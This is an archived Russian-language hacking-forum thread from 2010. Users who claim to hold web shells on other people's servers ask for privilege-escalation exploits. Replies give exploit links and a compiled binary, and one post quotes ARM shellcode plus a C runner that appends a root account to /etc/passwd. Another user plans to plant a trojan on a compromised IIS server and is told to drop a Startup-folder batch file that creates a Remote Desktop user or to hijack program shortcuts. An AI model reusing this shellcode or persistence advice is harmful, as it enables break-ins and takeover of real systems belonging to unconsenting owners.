ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
21.11.2010, 01:30
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
930
Репутация:
0
|
|
Есть шелл,нужен сплоит (первый раз встречаю Macintosh HD)
Server.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT
2009; root:xnu-1228.15.4~1/RELEASE_I386 i386
|
|
|
24.11.2010, 21:28
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 18
Провел на форуме:
278340
Репутация:
0
|
|
Linux vps1.pdm.su 2.6.26-2-openvz-amd64 #1 SMP Sun Jun 20 20:28:43 UTC 2010 x86_64
|
|
|
|
25.11.2010, 02:41
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
930
Репутация:
0
|
|
Сообщение от ubi
ubi said:
Linux vps1.pdm.su 2.6.26-2-openvz-amd64 #1 SMP Sun Jun 20 20:28:43 UTC 2010 x86_64
https://rdot.org/forum/archive/index.php/t-714.html
http://www.securityfocus.com/bid/36901/exploit
|
|
|
|
26.11.2010, 10:13
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479
Репутация:
0
|
|
Не могу нормально скомпилить. Даже на своей машине.
Сообщение от None
snip:~# gcc -o exp exp.c
exp.c: In function 'main':
exp.c:79: warning: incompatible implicit declaration of built-in function 'strlen'
Код:
Code:
#include
char SC[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
|
|
|
|
26.11.2010, 14:25
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
Попробуй добавить ещё
#include
|
|
|
|
27.11.2010, 01:01
|
|
Новичок
Регистрация: 14.06.2010
Сообщений: 0
Провел на форуме:
930
Репутация:
0
|
|
Сообщение от DCrypt
DCrypt said:
Не могу нормально скомпилить. Даже на своей машине.
Код:
Code:
#include
char SC[] =
/* Thumb mode */
"\x05\x50\x45\xe0" /* sub r5, r5, r5 */
"\x01\x50\x8f\xe2" /* add r5, pc, #1 */
"\x15\xff\x2f\xe1" /* bx r5 */
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x78\x46" /* mov r0, pc */
"\x7C\x30" /* adds r0, #124 */
"\xff\x21" /* movs r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\xff\x31" /* adds r1, #255 */
"\x45\x31" /* adds r1, #69 */
"\xdc\x22" /* movs r2, #220 */
"\xc8\x32" /* adds r2, #200 */
"\x05\x27" /* movs r7, #5 */
"\x01\xdf" /* svc 1 */
/* r8 = fd */
"\x80\x46" /* mov r8, r0 */
/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x79\x46" /* mov r1, pc */
"\x18\x31" /* adds r1, #24 */
"\xc0\x46" /* nop (mov r8, r8) */
"\x48\x22" /* movs r2, #72 */
"\x04\x27" /* movs r7, #4 */
"\x01\xdf" /* svc 1 */
/* close(fd) */
"\x41\x46" /* mov r1, r8 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x06\x27" /* movs r7, #6 */
"\x01\xdf" /* svc 1 */
/* exit(0) */
"\x1a\x49" /* subs r1, r1, r1 */
"\x08\x1c" /* adds r0, r1, #0 */
"\x01\x27" /* movs r7, #1 */
"\x01\xdf" /* svc 1 */
/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
"\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
"\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
"\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
"\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
"\x68\x0a"
/* /etc/passwd */
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
У меня без проблем (2.6.17-gentoo-r8)
попробуй так:
gcc -o file file.c -lpthread
скомпилил
http://depositfiles.com/files/2sebpiiyg
|
|
|
|
29.11.2010, 07:03
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его Что есть из пабликового?
|
|
|
|
29.11.2010, 12:54
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Если есть вариант залить в папку с автозагрузкой (по умолчанию C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а) батник с созданием пользователя удаленного стола, то так и делай
Так же можешь подредактировать ярлыки программ (вставив запуск своего файла) если нет, то хоть версию iis скажи...
|
|
|
|
01.12.2010, 17:49
|
|
Постоянный
Регистрация: 26.03.2008
Сообщений: 311
Провел на форуме:
3799424
Репутация:
479
|
|
ищу под 2.6.18-194
|
|
|
|
01.12.2010, 17:55
|
|
Постоянный
Регистрация: 21.12.2007
Сообщений: 475
Провел на форуме:
1270580
Репутация:
387
|
|
Сообщение от попугай
попугай said:
Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его
Что есть из пабликового?
http://www.exploit-db.com/exploits/15609/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
